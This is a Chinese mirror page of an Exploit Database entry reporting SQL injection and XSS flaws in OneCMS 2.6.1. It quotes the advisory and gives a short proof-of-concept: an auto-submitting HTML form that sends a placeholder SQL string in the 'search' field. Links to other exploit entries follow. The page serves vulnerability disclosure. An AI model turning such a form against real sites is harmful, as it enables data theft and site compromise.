OneCMS 2.6.1 – ‘search’ SQL Injection

Exploit Database
88 阅读

作者： High-Tech Bridge SA

日期： 2010-06-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34211/

source: https://www.securityfocus.com/bid/41194/info
 
OneCMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
OneCMS 2.6.1 is vulnerable; prior versions may also be affected.

<form action="http://www.example.com/search.php?view=forums" method="post" name="main" >
<input type="hidden" name="search" value="1+any sql" />
</form>
<script>
document.main.submit();
</script>

last Exploits
OneCMS 2.6.1 – ‘search’ SQL Injection的更多信息

Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)：
Lot Reservation Management System 1.0 – Cross-Site Scripting (Stored)：
ManageEngine ServiceDesk Plus 9.0 – SQL Injection：
IBM Tivoli Access Manager for E-Business – ‘/ibm/wpm/domain?method’ Cross-Site Scripting：
E-Sic Software livre CMS – ‘cpfcnpj’ SQL Injection：
Worksforweb iAuto – Multiple Cross-Site Scripting / HTML Injection Vulnerabilities：
DIGISOL DG-HR1400 Wireless Router – Cross-Site Request Forgery：
Diem 5.1.2 – Multiple Cross-Site Scripting Vulnerabilities：